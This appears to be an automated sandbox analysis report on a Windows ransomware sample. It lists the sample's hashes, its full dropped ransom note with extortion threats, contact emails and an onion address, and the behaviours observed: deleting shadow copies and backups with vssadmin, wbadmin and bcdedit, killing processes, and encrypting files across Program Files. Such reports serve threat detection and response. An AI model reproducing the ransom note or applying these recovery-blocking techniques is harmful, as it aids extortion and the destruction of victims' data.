ee65e9d7a7bc9d17e894e0b775fc0bbfb35e72c65c3d768e34bfe059d521cc16

Resubmissions

21-01-2024 14:52

240121-r8syqaeac7 10

21-01-2024 14:51

240121-r8k8waeac5 10

01-01-2024 13:55

240101-q776kscacp 10

Analysis

max time kernel
181s
max time network
150s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
01-01-2024 13:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
Size

333KB
MD5

db88a1bd11ca3aab7a0890a10a10f45d
SHA1

0e01e118613962e364b76869bcfb9d26cf0a6505
SHA256

97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d
SHA512

b6e374ea42e023d973baa2c8c3ce8c34a7c8ffa1aefd52f787eb51f980e1e1f8c2c6081d90cd0cf1b15166b86ed57dc2d7b9adde5021dd00cc629f8aae8df023
SSDEEP

6144:YemY9cZrt2pF+M9htFl/1M0lpj9G/OaZE8ABInatk1:/9cm+M9vFl/1HrNInatk1

Score

10^/10

evasion ransomware

Malware Config

Extracted

Path

F:\How_to_back_files.html

Ransom Note

<html> <style type="text/css"> body { background-color: #f5f5f5; } h1, h3{ text-align: center; text-transform: uppercase; font-weight: normal; } /*---*/ .tabs1{ display: block; margin: auto; } .tabs1 .head{ text-align: center; float: top; padding: 0px; text-transform: uppercase; font-weight: normal; display: block; background: #81bef7; color: #DF0101; font-size: 30px; } .tabs1 .identi { font-size: 10px; text-align: center; float: top; padding: 15px; display: block; background: #81bef7; color: #DFDFDF; word-break: break-all; } .tabs .content { background: #f5f5f5; /*text-align: center;*/ color: #000000; padding: 25px 15px; font-size: 15px; font-weight: 400; line-height: 20px; } .tabs .content a { color: #df0130; font-size: 23px; font-style: italic; text-decoration: none; line-height: 35px; } .tabs .content .text{ padding: 25px; line-height: 1.2; } </style> <body> <div class="tabs1"> <div class="head" ><b>Your personal ID:</b></div> <div class="identi"> <span style="width:1000px; color: #ffffff; font-size: 10px;">i+/yvnUc1Dm/m3FoQkSRGgKtiZYCbJbUC05sdHoXanmYQlUIJJATiVgmwg0TzQMYuTKliWtDE+8+xh4da9NgxW2Qkx+DUiHaQxFnfp5IpxNKfPk0su11Gnqn2ERp7zmixCjJzNj6B3lVdNTchac0yzlMN2KsKb1a1E9nEaKUWpzAGSh2WOGNGP0nKmY5XumaSZMEJECfhUtYJKe3EvynMx7AIbh12PJVR8y3r7WTx/rXFo/3TNTQhqG+mtQoUvq1KNDpfhBkl97yxYbLEIZcnVhvJIrbtKzJc/SKEv4Ax3HmQKIM/F47j5fFbWrRu8V5iJX6wykWj/G2RuFuXcTAwVGf2HqULq78ANjixj3bc5xlhOm96AF2BnlsZ+MbeVPvrqbUKQesQBUx61ZEZz/T2YTxs1PDG1b5K7lTty9aLhN8dZnheqhB2T+VSDsOyqQnwq2Z3Cx76EOp3sHNPjmxViarvcN91d2mbZv/2yAgPwpnAoGvibkfmqVKCkR+UTt6LA1Ew1tezvFVdmbHP0QAcnStKtXDVb1Byzc6e9yhS5wuVKgkZUv3oM9AAWAJE3VBWo4Tj1SaBBpNwP/qgJNwOIzJhj43+iVFGvLpzmUlI2jrE1F49D/ImWStxWU4OsfsrvXxsTxqmzJk6vmD2yfWsuy7LvGm055vzQ82+rIuqpeANS3WdLgBcw1MkciDUgYz9OZu6Aeh5LIuuXWrw7w3kSCZlw7g1d6wqWbvsibcPOiF2NOYMpgqmhZNtovGh5Kaj9XCRajLZMwFNW8SYmFEzs+TCVwScLoizU/w3zJ0ZevSv8bg5huxkZ/jDYFTEX7C1AVRF9Kdj01YpvdMFZh7HNPj6aWV256jUZLMDFCGKQez+SelLtNY6dwnQexAC8NPuDcWKaT/QcU6RrGuBcpx5FZTutZpp2ip8/ORcQ5ZV8fg4iNgHFL8t4L/w2moZlF6FmGr5He4ihtSaZlP3TGAmBbPXBS4mR+J1ROX75Ie+x0fYDnxjmPUTv/02U3pgkAP89YhoMBwAwKlXgkxnsOoZiVvsJbU8g8bb+0TGlIVn8Ljdj2V+B2kxdde3N2rcobCa1oWw6quPa2nsj1B54vziDfHAGOmxp2bKBXfNk/wHU1OHHxfGb0kUcAnZg3XI1zM2KIahnJiPUtFSmr0mT+BAI2JwFk/B2Br6k+fV3CYcT+coG7IEpHr4j6iSTnSxhYaH+WG2mIy1ZVjfOIwYXvFSU1S3tkFFVVbeAUyGb4Tc5VNTb2ZijnJelmoqVDbGljPPi5F8mgLobUoxrz0u3ejKk553LXJifyo9ykjgZRVqyssOiXz7DTx4Da1WZvnQd+fBzF+VfYN5zAiZWOOiue/YS7XdNwL+PGNJnWhc1/VjW2OipLISXpL960p1+tQVCLaoTOrt/e9hqC60jtZwsg9lh9X4wfCTsMz/EMb/TgQLQjBs6VzAnrSJc2sWR3n0OkeMwcDDOSrOKwEVjR6huqzQe7LwBFC2KVDauvyEZxeAaOVD/VHMtMiim8WJhmawDcxXfzqBx/ik3vkRkdVBttUAw6cPHWoAWeoQLcpFntKLAX6lGJI+bM9geWUPTvETt5c6fWGw7GZ2fnMp+Lknk/q29oftEQECqcGySqRG/eVfdEiIQo8NqKIrshLkPOR6aKCRkl33hAicFB7yH+zauT2OXLt0FYCqnqyS5hDWfLd6xc=</span> <br>  </div> </div>  <div class="tabs">  <div class="tab"> <div id="tab-content1" class="content"> <div class="text">  <b>/!\ YOUR COMPANY NETWORK HAS BEEN PENETRATED /!\</b><br> <b>All your important files have been encrypted!</b><br><br> <hr> Your files are safe! Only modified. (RSA+AES)<br><br> ANY ATTEMPT TO RESTORE YOUR FILES WITH THIRD-PARTY SOFTWARE<br> WILL PERMANENTLY CORRUPT IT.<br> DO NOT MODIFY ENCRYPTED FILES.<br> DO NOT RENAME ENCRYPTED FILES.<br><br> No software available on internet can help you. We are the only ones able to<br> solve your problem.<br><br> We gathered highly confidential/personal data. These data are currently stored on<br> a private server. This server will be immediately destroyed after your payment.<br> If you decide to not pay, we will release your data to public or re-seller.<br> So you can expect your data to be publicly available in the near future..<br><br> We only seek money and our goal is not to damage your reputation or prevent<br> your business from running.<br><br> You will can send us 2-3 non-important files and we will decrypt it for free<br> to prove we are able to give your files back.<br><br>  <hr> <b>Contact us for price and get decryption software.</b><br><br> <hr> <b>email:</b><br> <a href="ithelp07@securitymy.name ">ithelp07@securitymy.name </a> <br> <a href="ithelp07@yousheltered.com ">ithelp07@yousheltered.com </a> <br> <p>* To contact us, create a new free email account on the site: <a href="https://protonmail.com">protonmail.com <br> <b> IF YOU DON'T CONTACT US WITHIN 72 HOURS, PRICE WILL BE HIGHER.</b><br> <p>* Tor-chat to always be in touch: <a href<a href<b> </div> </div> </div>  <b> <b> <b> <span style="font-size: 22px">qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion</span> </b><br><br> </b><br>  </div> </div>  </div> </div> </body> </html>

Emails

href="ithelp07@securitymy.name

">ithelp07@securitymy.name

href="ithelp07@yousheltered.com

">ithelp07@yousheltered.com

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe

description pid process target process

PID 2816 created 1208 2816 97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe Explorer.EXE
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

2568 bcdedit.exe
2364 bcdedit.exe
Renames multiple (1351) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Deletes System State backups 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command and Scripting Interpreter
T1059

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

2884 wbadmin.exe
Deletes system backups 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command and Scripting Interpreter
T1059

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

2700 wbadmin.exe

description	pid	process	target process
PID 2816 created 1208	2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe	Explorer.EXE

pid	process
2568	bcdedit.exe
2364	bcdedit.exe

pid	process
2884	wbadmin.exe

pid	process
2700	wbadmin.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe

description	ioc	process
File opened (read-only)	\??\N:	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened (read-only)	\??\R:	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened (read-only)	\??\K:	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened (read-only)	\??\B:	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened (read-only)	\??\J:	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened (read-only)	\??\L:	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened (read-only)	\??\Q:	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened (read-only)	\??\F:	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened (read-only)	\??\I:	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened (read-only)	\??\T:	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened (read-only)	\??\X:	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened (read-only)	\??\Y:	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened (read-only)	\??\Z:	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened (read-only)	\??\G:	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened (read-only)	\??\E:	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened (read-only)	\??\H:	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened (read-only)	\??\M:	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened (read-only)	\??\O:	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened (read-only)	\??\P:	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened (read-only)	\??\S:	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened (read-only)	\??\U:	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened (read-only)	\??\A:	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened (read-only)	\??\W:	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened (read-only)	\??\V:	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe

Drops file in Program Files directory 64 IoCs

Processes:

97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe

description	ioc	process
File opened for modification	C:\Program Files\Common Files\System\Ole DB\de-DE\msdasqlr.dll.mui	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\DVD Maker\directshowtap.ax	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.properties	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.metadata.repository.prefs	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert_5.5.0.165303.jar	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\MainMenuButtonIcon.png	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\RELEASE-NOTES.html	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\accessibility.properties	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Rarotonga	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\How_to_back_files.html	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_ja_4.4.0.v20140623020002.jar	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sr-spc.txt	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Graph.emf	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File created	C:\Program Files\Common Files\System\Ole DB\de-DE\How_to_back_files.html	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\La_Paz	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861258748.profile.gz	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director_2.3.100.v20140224-1921.jar	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.util_8.1.14.v20131031.jar	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\button-highlight.png	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\1047x576_91n92.png	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Troll	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\How_to_back_files.html	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\es-ES\MSTTSLoc.dll.mui	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_INTRO_BG.wmv	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Knox	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Pine_Lumber.jpg	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationLeft_ButtonGraphic.png	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench_1.2.1.v20140901-1244.jar	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\license.html	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\sl-SI\tipresx.dll.mui	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File created	C:\Program Files\Google\How_to_back_files.html	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Monaco	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\epl-v10.html	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationRight_ButtonGraphic.png	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationLeft_ButtonGraphic.png	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\How_to_back_files.html	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\InputPersonalization.exe.mui	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\ipsfra.xml	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Common Files\System\ado\es-ES\msader15.dll.mui	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\How_to_back_files.html	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.lucene.analysis_3.5.0.v20120725-1805.jar	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Circle_SelectionSubpictureB.png	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationRight_SelectionSubpicture.png	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Internet Explorer\en-US\networkinspection.dll.mui	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Kwajalein	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\COPYRIGHT	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\How_to_back_files.html	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\console_view.png	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_zh_4.4.0.v20140623020002.jar	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\ipshrv.xml	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File created	C:\Program Files\Common Files\System\ado\ja-JP\How_to_back_files.html	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\How_to_back_files.html	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yakutsk	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Campo_Grande	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Windhoek	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_ja_4.4.0.v20140623020002.jar	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationLeft_ButtonGraphic.png	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\include\win32\jni_md.h	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Porto_Velho	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme.nl_zh_4.4.0.v20140623020002.jar	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240389.profile.gz	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
File created	C:\Program Files\Common Files\Microsoft Shared\ink\pt-PT\How_to_back_files.html	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe

Drops file in Windows directory 3 IoCs

Processes:

wbadmin.exe

description	ioc	process
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl	wbadmin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

2584 vssadmin.exe

pid	process
2584	vssadmin.exe

Kills process with taskkill 14 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
944	taskkill.exe
476	taskkill.exe
1668	taskkill.exe
380	taskkill.exe
1004	taskkill.exe
1144	taskkill.exe
1572	taskkill.exe
1576	taskkill.exe
2256	taskkill.exe
824	taskkill.exe
2988	taskkill.exe
2960	taskkill.exe
2424	taskkill.exe
2616	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 42 IoCs

Processes:

97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe

pid	process
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
